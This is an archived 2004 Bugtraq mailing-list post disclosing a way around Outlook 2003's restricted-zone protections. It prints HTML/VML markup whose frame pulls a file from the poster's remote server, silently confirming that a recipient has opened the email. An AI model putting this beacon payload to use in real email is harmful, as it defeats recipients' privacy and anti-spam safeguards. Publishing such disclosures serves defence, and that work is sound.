lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Tue, 11 May 2004 15:41:38 -0000
From: "http-equiv@...ite.com" <1@...ware.com>
To: <bugtraq@...urityfocus.com>
Cc: <NTBugtraq@...tserv.ntbugtraq.com>
Subject: PING: Outlook 2003 Spam




Tuesday, May 11, 2004

Outlook 2003 the premier mail client from the company 
called 'Microsoft' certainly appears to have a lot of security 
features built into it.  Cursory examination shows excellent 
thought into 'spam' containment, 'security' consideration and 
many other little 'things'. So much so the default rendering of
html is in so-called 'restricted zone' which disallows nearly
everything [frames, iframes, objects, scripting etc.]. In 
addition 'special' spam measures are taken to disallow graphic 
downloads from a remote server in html email which can be used 
to verify recipients:

[screen shot: http://www.malware.com/duhlook.png 40KB]        

The Key Word is: nearly 

Utilising Outlook's own bizarre scheMAH ! which comprises 
a 'proper' frame along with an src pointing to our remote 
server, we are able to ping the server and confirm our recipient 
has viewed our email. We don't require graphics or frames or 
iframes to do that:

<v:vml frame style="LEFT: 50px; WIDTH: 300px; POSITION: 
relative; TOP: 30px; HEIGHT: 200px" 
src = "http://www.malware.com/duh.txt#malware"></v:vmlframe>

<HTML>
<HEAD>
<STYLE>
v\:* { behavior: url(#default#VML); }
</STYLE>
<XML:NAMESPACE NS="urn:schemas-microsoft-com:vml" PREFIX="v"/>
</HEAD>


Notes:

1. We now commence our examination of the Microsoft Office 2003 
suite, we're a bit late, but it has taken all this time to save 
up to buy the thing
2. Quick 72 hour prodding reveals that this 'perceived' premier 
device known as Outlook 2003 is in fact riddled with holes
3. Do not receive or open any emails period.  Use string and tin 
cans if you must communicate



End Call


-- 
http://www.malware.com






Powered by blists - more mailing lists